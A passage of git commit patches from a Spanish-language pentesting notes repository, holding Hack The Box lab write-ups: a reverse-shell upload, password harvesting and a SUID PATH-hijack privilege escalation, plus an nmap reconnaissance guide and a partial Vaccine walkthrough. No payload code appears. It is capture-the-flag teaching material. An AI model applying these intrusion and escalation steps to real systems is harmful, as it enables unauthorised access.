@@ -303,88 +303,88 @@ Perfecto, ya tendríamos nuestro archivo subido.

El siguiente paso sería ejecutar el archivo php-reverse-shell.php que hemos almacenado en la
-máquina víctima. El unico problema es que no sabemos donde se ha almacenado nuestro archivo.
-Para encontrar nuesto archvi utilizaremos la herramienta 'gobuester'.
+máquina víctima. El único problema es que no sabemos donde se ha almacenado nuestro archivo.
+Para encontrar nuestro archivo utilizaremos la herramienta 'gobuester'.
# Gobuster
-Gobuster es una herramienta utilizada para la fuerza bruta de busqueda de URL, incluidos directorios y archivos,
+Gobuster es una herramienta utilizada para la fuerza bruta de búsqueda de URL, incluidos directorios y archivos,
así como subdominios DNS.
Para instalarlo simplemente ejecutamos:
sudo apt install gobuster
- Y tambien tendremos que descargar los repositorios de direcciones, en esta ocasion utilizaremos un
+ Y también tendremos que descargar los repositorios de direcciones, en esta ocasión utilizaremos un
repositorio llamado 'wordlists' y en concreto la lista de directorios 'directory-list-2.3-small.txt.
- Podeis descargaros estas bibliotecas de directorios desde la misma página de github, existen un monton
+ Podéis descargaros estas bibliotecas de directorios desde la misma página de github, existen un montón
de variantes en función del sistema a explotar. De todas formas revisar primero si ya existe en
- vuestro sistema ya que algunos SO traen repositoios instalados.
+ vuestro sistema, ya que algunos SO traen repositorios instalados.
Para descargar o copiar:
https://gist.github.com/sl4v/c087e36164e74233514b
- En ese enlace encontrareis la biblioteca que vamos a utilizar, yo recomoento instalarlo en el siguiente
- directorio, si el directorio no existe crarlo.:
+ En ese enlace encontraréis la biblioteca que vamos a utilizar, yo recomiendo instalarlo en el siguiente
+ directorio, si el directorio no existe crearlo.:
/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
- Bien, ya tenemos nuesto Gobuster y nuestra biblioteca de directorios, ahora toca lanzar la herramienta a ver
+ Bien, ya tenemos nuestro Gobuster y nuestra biblioteca de directorios, ahora toca lanzar la herramienta a ver
que nos reporta:
gobuster dir --url http://[Ip Víctima]/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
- Ahora gobuster empezará a realizar pruebas y a mostrarnos resultados a medida q avanza. No tenemos que esperar a
- que finalice, simplemente fijaros en cuales son los directorios que reporta y ir probando a ver cuales son
+ Ahora gobuster empezará a realizar pruebas y a mostrarnos resultados a medida que avanza. No tenemos que esperar a
+ que finalice, simplemente fijaros en cuales son los directorios que reporta y ir probando a ver cuáles son
funcionales.

- Para para el proceso: Cntrl + c
+ Para el proceso: Cntrl + c
- En esta caso hemos tenido suerte ya que al poco de buscar a encontrado una ruta que nos dirige al directorio
+ En este caso hemos tenido suerte, ya que al poco de buscar ha encontrado una ruta que nos dirige al directorio
Uploads.
http://[Ip Víctima]/uploads/
- Una vez echo esto nos dirigiremos al navegador y tratremos de introducir la siguiente ruta:
+ Una vez hecho esto nos dirigiremos al navegador y trataremos de introducir la siguiente ruta:
http://[Ip Víctima]/uploads/php-reverse-shell.php

- Una vez echo esto volvemos a la terminal donde se encontraba el 'netcat' y deberia de haberse abierto
+ Una vez realizado esto, volvemos a la terminal donde se encontraba el 'netcat' y debería de haberse abierto
nuestra shell.

Efectivamente, ya tenemos nuestra reverse-shell preparada y activa.
- # Busqueda de la primera Flag:
+ # Búsqueda de la primera Flag:
Una vez tengamos la shell activa, podemos ver los directorios mediante ls:

Vamos a ver que Usuarios tenemos registrados en el sistema, para ello nos dirigimos al directorio /home y vemos
- q existe el usuario 'robert'.
+ que existe el usuario 'robert'.

- Y bingo!! dentro del directorio 'robert' podemos ver el archivo 'user.txt' que contiene la primera Flag.
+ Y bingo!! Dentro del directorio 'robert' podemos ver el archivo 'user.txt' que contiene la primera Flag.

- Mediante el comando cat podemos ver en la terminal el contenido del archivo:
+ Mediante el comando 'cat' podemos ver en la terminal el contenido del archivo:
cat user.txt

-Ahora para poder trabajar de manera más comoda y tratar de escalar privilegios, primero, abriremos una shell
+Ahora, para poder trabajar de manera más cómoda y tratar de escalarar privilegios, primero, abriremos una shell
más funcional. Para ello volvemos al directorio principal mediante cd y ejecutamos el siguiente comando:
@@ -395,7 +395,7 @@ más funcional. Para ello volvemos al directorio principal mediante cd y ejecuta

Bien, ahora ya tenemos una shell más segura y funcional. Ya hemos visto que con el usuario actual no podemos
-hacer mucho más ya que tenemos el acceso restringido al sistema.
+hacer mucho más, ya que tenemos el acceso restringido al sistema.
Ya que el sitio web utiliza PHP y SQL, podemos tratar de comprobar el directorio web en busca de posibles
divulgaciones o configuraciones incorrectas.
@@ -405,14 +405,14 @@ ver uno con el nombre 'login' (/var/www/html/cdn-cgi/login) que contiene distint

-Aparecen tres archivos '.php' y uno '.js', el siguiente paso seria buscar información en el codigo fuente de cada
+Aparecen tres archivos '.php' y uno '.js', el siguiente paso sería buscar información en el codigo fuente de cada
archivo. Para ello, buscaremos cadenas interesantes con el uso de la herramienta 'grep'.
Grep es una herramienta que busca patrones en cada archivo e imprime las líneas que coinciden con los patrones.
-Junto a esta herramienta podemos utilizar el comnado 'cat' para leer todos los arhcivos filtrados por 'grep'.
+Junto a esta herramienta podemos utilizar el comanado 'cat' para leer todos los archivos filtrados por 'grep'.
Con grep utilizaremos el patrón 'passw' para tratar de roportar todas los resultados con ese inicio de palabra (como
-passwd o password por ejemplo). Tambien utilizaremos -i para ignorar las palabras sensibles a mayúsculas y minúsculas
+passwd o password por ejemplo). También usaremos -i para ignorar las palabras sensibles a mayúsculas y minúsculas
como por ejemplo las contraseñas en este caso.
cat * | grep -i passw*
@@ -430,14 +430,14 @@ como por ejemplo las contraseñas en este caso.

Podemos ver como tenemos un usuario llamado 'robert'. Vamos a tratar de entrar como este usuario mediante el
-comadno 'su' y con la contraseña previamente encontrada.
+comando 'su' y con la contraseña previamente encontrada.
su robert

-Podemos ver que la contraseña no corresponde con este usuario. Como no nos sirve está contraseña vamos a seguir
+Podemos ver que la contraseña no corresponde con este usuario. Como no nos sirve está contraseña, vamos a seguir
revisando los archivos ".php" y ".js" de manera manual en busca de algo más.
Tras revisar los cuatro archivos, vemos que en el archivo 'db.php' encontramos la siguiente información:
@@ -446,19 +446,19 @@ Tras revisar los cuatro archivos, vemos que en el archivo 'db.php' encontramos l

-Como podeis ver aparecen cuatro palabras que podemos probar como contraseñas, tras probarlas vemos como la
+Como podéis ver aparecen cuatro palabras que podemos probar como contraseñas, tras probarlas vemos como la
contraseña del usuario 'robert' es "M3g4C0rpUs3r!"
su robert

-Finalmente estamos como el usuario 'robert', podemos comprobarlo utilizando el comando 'whoami':
+Finalmente, estamos como el usuario 'robert', podemos comprobarlo utilizando el comando 'whoami':

-Ahora podemos ir al directorio pricipal /home/robert y veremos como ahi está nuestro archivo user.txt con
-nuestra primera flag que ya habiamos visto anteriormente sin necesidad de ningún privilegio.
+Ahora podemos ir al directorio principal /home/robert y veremos como ahí está nuestro archivo user.txt con
+nuestra primera flag que ya habíamos visto anteriormente sin necesidad de ningún privilegio.
cd /home/robert
@@ -470,19 +470,19 @@ Pero nosotros lo que buscamos es la flag del super usuario y para ello debemos d
# Escalada de Privilegios.
-En primer luegar trataremos de iniciar sesion como super usuario mediante 'sudo':
+En primer lugar, trataremos de iniciar sesión como super usuario mediante 'sudo':
sudo su robert

-Tras probar las contraseñas previamente rocopiladas vemos como ningúna parece funcionar. Vamos a seguir buscando
+Tras probar las contraseñas previamente recopiladas vemos como ninguna parece funcionar. Vamos a seguir buscando
información, está vez, vamos a revisar los grupos en los que forma parte el usuario 'robert', para ello
utilizaremos el comando 'id':

-Vemos como el usurio robert es parte del grupo 'bugtracker'. Ahora, intentemos ver si hay algún
+Vemos como el usuario robert es parte del grupo 'bugtracker'. Ahora, intentemos ver si hay algún
binario dentro de ese grupo:
find / -group bugtracker 2>/dev/null
@@ -495,13 +495,13 @@ Nos ha reportado un archivo llamado 'bugtracker'. Ahora comprobamos qué privile

-Podemos ver que existe un conjunto 'SUID' en ese binario, este es un buen camino de eplotación para tratar de
+Podemos ver que existe un conjunto 'SUID' en ese binario, este es un buen camino de explotación para tratar de
escalar privilegios.
-Un archivo SUID simepre se ejecuta como el usuario propietario del archivo, independientemente de que usuaio
+Un archivo SUID siempre se ejecuta como el usuario propietario del archivo, independientemente de que usuario
pase el comando.
-En nuestro caso, el 'butracker' binario es propiedad de 'root' y por tanto podemos ejecutalo como root ya
+En nuestro caso, el 'butracker' binario es propiedad de 'root' y por tanto, podemos ejecutalo como root ya
que tiene configurado SUID.
Para ello ejecutamos 'bugtacker':
@@ -510,7 +510,7 @@ Para ello ejecutamos 'bugtacker':

-En mi caso probe con 'home' para ver que me reportava:
+En mi caso probé con 'home' para ver que me reportaba:

@@ -540,14 +540,14 @@ Una vez preparado el archivo 'cat', debemos agregar el directorio /tmp a la vari
PATH es una variable de entorno en sistemas operativos similares a Unix, DOS, OS/2 y Microsoft Windows, que especifica un conjunto de directorios donde se encuentran los programas ejecutables.
-Por tanto debemos introducir el directorio 'tmp' en el archivo PATH
-para poder ejecutarlo correctamente. Para ello utillizamos el siguiente comando:
+Por tanto, debemos introducir el directorio 'tmp' en el archivo PATH
+para poder ejecutarlo correctamente. Para ello utilizamos el siguiente comando:
export PATH=/tmp:$PATH

-Para confirmar que todo a salido correctamente y verificar que el directorio 'tmp' está en PATH:
+Para confirmar que todo ha salido correctamente y verificar que el directorio 'tmp' está en PATH:
echo $PATH
@@ -558,13 +558,13 @@ Ahora, volvemos a ejecutar 'bugtracker' desde el directorio '/tmp':

-Genial, ya estamos registrados como 'root'. Finalmente, nos dirigimos al directorio '/root' donde encontramos el archivos 'root.txt.'.
+Genial, ya estamos registrados como 'root'. Finalmente, nos dirigimos al directorio '/root' donde encontramos el archivo 'root.txt.'.
Para poder leer el archvio nos registramos como super usuarios:
sudo su
-Y abrimos el archivo con 'cat' donde econtramos la última flag:
+Y abrimos el archivo con 'cat' donde encontramos la última Flag:
cat root.txt
From c1aa8cca22ce6d159e4ee1a5c3fa22d101f4f973 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 20:37:12 +0200
Subject: [PATCH 0028/1701] Update index.md
---
index.md | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 5a4a603bd8d..2b90f8b987f 100644
--- a/index.md
+++ b/index.md
@@ -7,7 +7,6 @@
[HTB-Responder](./HTB-Responder.html)
-
## Herramientas y Scripts
[WichSystem](./WichSystem.html)
@@ -16,5 +15,11 @@
[php-reverse-shell.php](./php-reverse-shell.html)
+## Artículos
+
+[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB)
+
+
+
---
From eb76da97fc14653733d371b19269105754ea250f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 20:37:57 +0200
Subject: [PATCH 0029/1701] Create fase_de_reconocimiento-HTB
---
fase_de_reconocimiento-HTB | 103 +++++++++++++++++++++++++++++++++++++
1 file changed, 103 insertions(+)
create mode 100644 fase_de_reconocimiento-HTB
diff --git a/fase_de_reconocimiento-HTB b/fase_de_reconocimiento-HTB
new file mode 100644
index 00000000000..612e255be6a
--- /dev/null
+++ b/fase_de_reconocimiento-HTB
@@ -0,0 +1,103 @@
+# Fase de Reconocimiento - HTB
+
+ Aquí trato de mostrar unas pautas muy básicas de
+ reconocimiento. El reconocimiento es una parte
+ fundamental, ya que necesitamos conocer a lo que
+ nos enfrentamos para poder buscar vulnerabilidades.
+
+ En primer lugar, debemos asegurar que estamos conectados
+ a la víctima y tratar de recopilar la máxima información
+ posible.
+
+# PING
+
+ Para verificar la conexión y tener una primera toma de
+ contacto utilizaremos el comando 'ping'.
+
+ ping [Ip Víctima]
+
+ Mediante este comando podemos obtener la siguiente
+ información:
+
+ - Verificar la conexión.
+ - La latencia. Podemos observar el tiempo de recorrido
+ de un paquete.
+ - Podemos obtener la Ip de un dominio.
+ - Determinar si estamos frente a un SO Linux o Windows:
+ Windows ttl = 128
+ Linux ttl = 64
+
+
+ # NMAP
+
+ Tras conocer la máquina a la que nos enfrentamos
+ pasaremos analizar los protocolos tcp/udp.
+
+ Primero analizaremos los puertos tcp ya que son los más
+ utilizados y los más rápidos de escanear.
+
+ Mediante nmap realizaremos varios escaneos, el primero
+ será un análisis de todos los puertos abiertos del
+ protocolo tcp.
+
+ nmap -p- --open -T5 -v -n [Ip]
+
+ -p- : Escanea todo el rango de puertos.
+
+ --open : Solo nos mostrará puertos con el estatus
+ abierto.
+
+ -T5 : Controla el tiempo y el rendimiento del
+ escaneo donde 1 es el más lento y 5 el
+ más rápido.
+
+ -v : Verbose. Recopila los puertos abiertos por
+ TCP y los reporta por consola.
+
+ -n : Anula la resolución DNS.
+
+ Ahora para poder trabajar mejor, exportaremos una lista
+ en formato Grepeable al archivo 'allPorts'
+
+ nmap -p- --open -T5 -v -n [Ip] -oG allPorts
+
+ -oG : Exportar los resultados en formato grepeable.
+
+ allPorts : Nombre del archivo. Si no existe lo creará.
+
+ De esta manera podremos revisar los puertos que estaban
+ abiertos en cualquier momento.
+
+ # NMAP
+
+ESCANEO EXHAUSTIVO:
+
+ Tras conocer los puertos TCP abiertos, realizaremos un
+ segundo escaneo enfocado en los puertos abiertos para ver
+ la información que nos reportan y exportarlo en formato
+ nmap al archivo 'targed'.
+
+ nmap -sC -sV -p[Port1,Port2] -oN targed
+
+ -sC : Lanza scrips básicos de reconocimiento.
+
+ -sV : Localiza la versión y servicio de los puertos definidos.
+
+ -p : Puertos a escanear. Ej: -p22,80
+
+ -oN : Reporta los resultados en formato nmap al archivo 'targed'.
+
+
+ # WHATWEB
+
+ Es una herramienta que se utiliza para tratar de
+ averiguar
+ el gestor de contenido de la Ip. Nos reportará
+ información varia del sistema.
+
+ whatweb http://[Ip]
+
+ whatweb http://[Host]
+
+
+
From 5ced502c87b21995652727b7333b0a5333d62776 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 20:41:31 +0200
Subject: [PATCH 0030/1701] Update and rename fase_de_reconocimiento-HTB to
Fase_de_reconocimiento-HTB
---
fase_de_reconocimiento-HTB => Fase_de_reconocimiento-HTB | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
rename fase_de_reconocimiento-HTB => Fase_de_reconocimiento-HTB (98%)
diff --git a/fase_de_reconocimiento-HTB b/Fase_de_reconocimiento-HTB
similarity index 98%
rename from fase_de_reconocimiento-HTB
rename to Fase_de_reconocimiento-HTB
index 612e255be6a..dd8278e5ec9 100644
--- a/fase_de_reconocimiento-HTB
+++ b/Fase_de_reconocimiento-HTB
@@ -9,7 +9,7 @@
a la víctima y tratar de recopilar la máxima información
posible.
-# PING
+## PING
Para verificar la conexión y tener una primera toma de
contacto utilizaremos el comando 'ping'.
@@ -28,7 +28,7 @@
Linux ttl = 64
- # NMAP
+ ## NMAP
Tras conocer la máquina a la que nos enfrentamos
pasaremos analizar los protocolos tcp/udp.
@@ -68,7 +68,7 @@
De esta manera podremos revisar los puertos que estaban
abiertos en cualquier momento.
- # NMAP
+ ## NMAP
ESCANEO EXHAUSTIVO:
@@ -88,7 +88,7 @@ ESCANEO EXHAUSTIVO:
-oN : Reporta los resultados en formato nmap al archivo 'targed'.
- # WHATWEB
+ ## WHATWEB
Es una herramienta que se utiliza para tratar de
averiguar
From 737a169ec3ddeae0fcb10ac8b5641172d9edad3b Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 20:44:18 +0200
Subject: [PATCH 0031/1701] Update index.md
---
index.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 2b90f8b987f..e1e6c347a10 100644
--- a/index.md
+++ b/index.md
@@ -17,7 +17,7 @@
## Artículos
-[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB)
+[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
From 525f2b357fd6f4f5cb279c993b50ab2a6cc8d267 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 20:44:41 +0200
Subject: [PATCH 0032/1701] Rename Fase_de_reconocimiento-HTB to
Fase_de_reconocimiento-HTB.md
---
Fase_de_reconocimiento-HTB => Fase_de_reconocimiento-HTB.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Fase_de_reconocimiento-HTB => Fase_de_reconocimiento-HTB.md (100%)
diff --git a/Fase_de_reconocimiento-HTB b/Fase_de_reconocimiento-HTB.md
similarity index 100%
rename from Fase_de_reconocimiento-HTB
rename to Fase_de_reconocimiento-HTB.md
From 24ef3e63eb1607b52cd2b6d4b28c1742d0ee3b7a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 20:46:39 +0200
Subject: [PATCH 0033/1701] Update Fase_de_reconocimiento-HTB.md
---
Fase_de_reconocimiento-HTB.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Fase_de_reconocimiento-HTB.md b/Fase_de_reconocimiento-HTB.md
index dd8278e5ec9..82b8b131184 100644
--- a/Fase_de_reconocimiento-HTB.md
+++ b/Fase_de_reconocimiento-HTB.md
@@ -28,7 +28,7 @@
Linux ttl = 64
- ## NMAP
+## NMAP
Tras conocer la máquina a la que nos enfrentamos
pasaremos analizar los protocolos tcp/udp.
@@ -68,7 +68,7 @@
De esta manera podremos revisar los puertos que estaban
abiertos en cualquier momento.
- ## NMAP
+## NMAP
ESCANEO EXHAUSTIVO:
@@ -88,7 +88,7 @@ ESCANEO EXHAUSTIVO:
-oN : Reporta los resultados en formato nmap al archivo 'targed'.
- ## WHATWEB
+## WHATWEB
Es una herramienta que se utiliza para tratar de
averiguar
From 069f486c54ded799c8d74f871b2424e1e5098042 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 21:22:25 +0200
Subject: [PATCH 0034/1701] Update Fase_de_reconocimiento-HTB.md
---
Fase_de_reconocimiento-HTB.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/Fase_de_reconocimiento-HTB.md b/Fase_de_reconocimiento-HTB.md
index 82b8b131184..c7116615a81 100644
--- a/Fase_de_reconocimiento-HTB.md
+++ b/Fase_de_reconocimiento-HTB.md
@@ -1,3 +1,5 @@
+
+
# Fase de Reconocimiento - HTB
Aquí trato de mostrar unas pautas muy básicas de
@@ -11,6 +13,9 @@
## PING
+
+
+
Para verificar la conexión y tener una primera toma de
contacto utilizaremos el comando 'ping'.
From 8600f1e65726565c9b957523cf93cbb989e09052 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 21:25:49 +0200
Subject: [PATCH 0035/1701] Update Fase_de_reconocimiento-HTB.md
---
Fase_de_reconocimiento-HTB.md | 8 +++++++-
1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/Fase_de_reconocimiento-HTB.md b/Fase_de_reconocimiento-HTB.md
index c7116615a81..6d41e7b2194 100644
--- a/Fase_de_reconocimiento-HTB.md
+++ b/Fase_de_reconocimiento-HTB.md
@@ -11,6 +11,8 @@
a la víctima y tratar de recopilar la máxima información
posible.
+---
+
## PING

@@ -31,7 +33,8 @@
- Determinar si estamos frente a un SO Linux o Windows:
Windows ttl = 128
Linux ttl = 64
-
+
+---
## NMAP
@@ -72,6 +75,8 @@
De esta manera podremos revisar los puertos que estaban
abiertos en cualquier momento.
+
+---
## NMAP
@@ -92,6 +97,7 @@ ESCANEO EXHAUSTIVO:
-oN : Reporta los resultados en formato nmap al archivo 'targed'.
+---
## WHATWEB
From fa31ebaffdf501745f2440c5a6881f0a6e67d11b Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 08:00:10 +0200
Subject: [PATCH 0036/1701] Create HTB-Vaccine.md
---
HTB-Vaccine.md | 14 ++++++++++++++
1 file changed, 14 insertions(+)
create mode 100644 HTB-Vaccine.md
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
new file mode 100644
index 00000000000..a4cf34b36e1
--- /dev/null
+++ b/HTB-Vaccine.md
@@ -0,0 +1,14 @@
+
+
+# HTB - Vaccine
+
+Resolución del starting poing de Hack the Box Vaccine.
+
+## Fase de Reconocimiento:
+
+### Ping:
+
+En primer lugar, vamos a comprobar si tenemos conexión con la máquina. Y si podemos averiguar el sistema
+operativo que utiliza mediante el ttl.
+
+ ping [Ip Víctima]
From f43e188bd746b6235edade0ad83950a28bdce44e Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 08:01:04 +0200
Subject: [PATCH 0037/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index a4cf34b36e1..5f5bfc5b9a1 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -11,4 +11,4 @@ Resolución del starting poing de Hack the Box Vaccine.
En primer lugar, vamos a comprobar si tenemos conexión con la máquina. Y si podemos averiguar el sistema
operativo que utiliza mediante el ttl.
- ping [Ip Víctima]
+ ping [Ip Víctima]
From 179d5aa41220945eaa35a3b2c2aa9e7cc96e14dc Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 08:08:03 +0200
Subject: [PATCH 0038/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 37 +++++++++++++++++++++++++++++++++++++
1 file changed, 37 insertions(+)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 5f5bfc5b9a1..2619cf57d96 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -12,3 +12,40 @@ En primer lugar, vamos a comprobar si tenemos conexión con la máquina. Y si po
operativo que utiliza mediante el ttl.
ping [Ip Víctima]
+
+Podemos observar que tiene un ttl=63, por tanto, ya sabemos que estamos frente a una máquina Linux.
+
+### Nmap - Primer escaneo:
+
+Ahora podemos escanear los puertos mediante nmap.
+
+ nmap -p- --open -T5 -n -v [Ip Víctima] -oG allPorts
+
+Esto nos guardará los puertos abiertos en el archivo 'allPorts' por si posteriormente queremos revisarlos
+de manera rápida accediendo al archivo guardado en nuestro directorio mediante la herramienta 'extractPorts'.
+
+ Puedes encontrar la descripción y la herramienta extractPorts creada por S4vitar en mi repositorio:
+ [ExtractPorts](https://f1r0x.github.io/ExtractPorts.html)
+
+ Es este caso podemos observar los siguientes puertos abiertos por el protocolo TCP:
+
+### Nmap -Segundo escaneo:
+
+Ahora pasaremos a realizar un escaneo más exhaustivo:
+
+ nmap -sC -sV -v -p22,80 [Ip Víctima] -oN target
+
+ -sC : Lanza scrips básicos de reconocimiento.
+
+ -sV : Localiza la versión y servicio de los puertos
+ definidos.
+
+ -p : Puertos a escanear. Ej: -p22,80
+
+ -oN : Reporta los resultados en formato nmap al archivo
+ targed.
+
+ Este escaneo, al igual que el anterior, nos guardará los resultados en nuestro directorio en el archivo 'target'.
+
+
+
From 5251f5c995837fa6b7546c4548122f40f5a5bb03 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 09:44:49 +0200
Subject: [PATCH 0039/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 105 +++++++++++++++++++++++++++++++++++++++++++++----
1 file changed, 98 insertions(+), 7 deletions(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 2619cf57d96..6691e32875b 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -1,5 +1,7 @@

+
+
# HTB - Vaccine
Resolución del starting poing de Hack the Box Vaccine.
@@ -8,6 +10,8 @@ Resolución del starting poing de Hack the Box Vaccine.
### Ping:
+
+
En primer lugar, vamos a comprobar si tenemos conexión con la máquina. Y si podemos averiguar el sistema
operativo que utiliza mediante el ttl.
@@ -24,28 +28,115 @@ Ahora podemos escanear los puertos mediante nmap.
Esto nos guardará los puertos abiertos en el archivo 'allPorts' por si posteriormente queremos revisarlos
de manera rápida accediendo al archivo guardado en nuestro directorio mediante la herramienta 'extractPorts'.
- Puedes encontrar la descripción y la herramienta extractPorts creada por S4vitar en mi repositorio:
+
+
+Puedes encontrar la descripción y la herramienta extractPorts creada por S4vitar en mi repositorio:
[ExtractPorts](https://f1r0x.github.io/ExtractPorts.html)
- Es este caso podemos observar los siguientes puertos abiertos por el protocolo TCP:
+ 
+
+ Es este caso podemos observar los puertos 21, 22 y 80 abiertos por el protocolo TCP.
### Nmap -Segundo escaneo:
-Ahora pasaremos a realizar un escaneo más exhaustivo:
-
- nmap -sC -sV -v -p22,80 [Ip Víctima] -oN target
+Ahora pasaremos a realizar un escaneo más exhaustivo utilizando una serie de scrips de reconocimiento:
+
+ 
+
+ nmap -sC -sV -v -p21,22,80 [Ip Víctima] -oN target
-sC : Lanza scrips básicos de reconocimiento.
-sV : Localiza la versión y servicio de los puertos
definidos.
- -p : Puertos a escanear. Ej: -p22,80
+ -p : Puertos a escanear. Ej: -p21,22,80
-oN : Reporta los resultados en formato nmap al archivo
targed.
+
+
+
+Este escaneo, al igual que el anterior, nos guardará los resultados en nuestro directorio en el archivo 'target'.
+Para abrir este archivo podemos utilizar el comando 'cat'.
+
+### Recopilación de los resultados:
+
+- Puerto 21/tcp:
+
+Algo interesante que podemos observar en el reporte de nmap es que el puerto 21/tcp permite el acceso mediante
+el inicio de sesión Anonymous. Este inicio de sesión por defecto nos permite entrar con el usuario 'anonymous'
+y sin necesidad de utilizar contraseña.
+
+También podemos observar que se encuentra un archivo disponible 'backup.zip'.
+
+- Puerto 22/tcp:
+
+Aquí podemos ver que tenemos un servicio ssh activo, usando un sistema Ubuntu.
+
+- Puerto 80/tcp:
+
+El puerto 80 tiene un servicio http activo, el cual, si nos dirigimos a firefox, podemos ver que nos reporta
+hasta una página de registro:
+
+
+
+
+
+Tras probar los usuarios y contraseñas más comunes no conseguimos entrar, por tanto, seguiremos investigando.
+
+En primer luegar, vamos a tratar de acceder como el usuario 'anonymous' por el puerto 80 que utiliza un servicio FTP
+y descargar el archivo 'backup.zip'.
+
+Para ello emplearemos el comando 'ftp' y especificando el usuario 'anonymous', luego nos pedirá una contraseña,
+como este usuario no requiere de contraseñas, simplemente presionamos Enter.
+
+ ftp [Ip Víctima]
+
+
+
+Ahora, mediante un 'ls' o un 'dir', vamos a tratar de ver que archivos encontramos:
+
+
+
+En mi caso no me permite ejecutar ninguno de los dos comandos. Pero como podemos ver nos reporta que consideremos
+utilizar PASV. Para ello, debemos activar el modo pasivo:
+
+ passive
+
+
+
+Tras activar el modo activo ya podremos utilizar el comando 'ls':
+
+
+
+Podemos ver que tenemos aquí el archvivo 'backup.zip'. Para tratar de descargarlo utilizaremos el comando 'get'.
+Recordar que podeis ver todos los comandos disponibles dentro se la shell de ftp utilizando el comando 'help'.
+
+
+
+Para descargar el archivo.zip:
+
+ get backup.zip
+
+
+
+Tener en cuenta que la shell está es muy inestable, en caso de error o de reportaros un 'Not Service' cerrar la shell
+con el comando 'exit' y volver a iniciar la shell siguiendo todos los pasos de manera continua, ya que a los pocos
+minutos, se desconecta.
+
+Una vez descargado el archivo.zip, cerramos la shell ftp y nos derigimos al directorio donde hemos descargado el
+arhcivo 'backup.zip'.
+
+
+
+
+
+
+
+
+
- Este escaneo, al igual que el anterior, nos guardará los resultados en nuestro directorio en el archivo 'target'.
From 7c158eb1b74ed37dc83f3f366666aef64529b1d1 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 09:50:56 +0200
Subject: [PATCH 0040/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 13 +++++++++++++
1 file changed, 13 insertions(+)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 6691e32875b..271144fd5de 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -130,6 +130,19 @@ arhcivo 'backup.zip'.

+Como podeís ver, tenemos los dos archivos previamente creados con nmap (allPorts y target) y nuestro archivo .zip.
+Vamos a crear un directorio mediante 'mkdir' llamado 'Backup' y vamos a introducir el archivo .zip para luego tratar
+de descomprimirlo.
+
+ mkdir Backup
+
+ mv backup.zip ./Backup/
+
+Una vez dentro del nuevo directorio, aplicaremos el comando 'unzip' para tratar de descomprimirlo:
+
+ unzip backup.zip
+
+
From 094faf68d524056a9aef2dc7242e2e7391ee6112 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 09:57:59 +0200
Subject: [PATCH 0041/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 10 +++++++++-
1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 271144fd5de..437ef015667 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -142,7 +142,15 @@ Una vez dentro del nuevo directorio, aplicaremos el comando 'unzip' para tratar
unzip backup.zip
-
+
+
+
+Al intentar descomprimir el arhcivo nos pide una contraseña, como desconozco la contraseña, presionado 'Enter'
+podemos ver como nos reporta que dentro del .zip contiene dos archivos (index.php y style.css):
+
+
+
+
From 8266c5d0f7208483acda30d2d8d4e6a336a8783a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
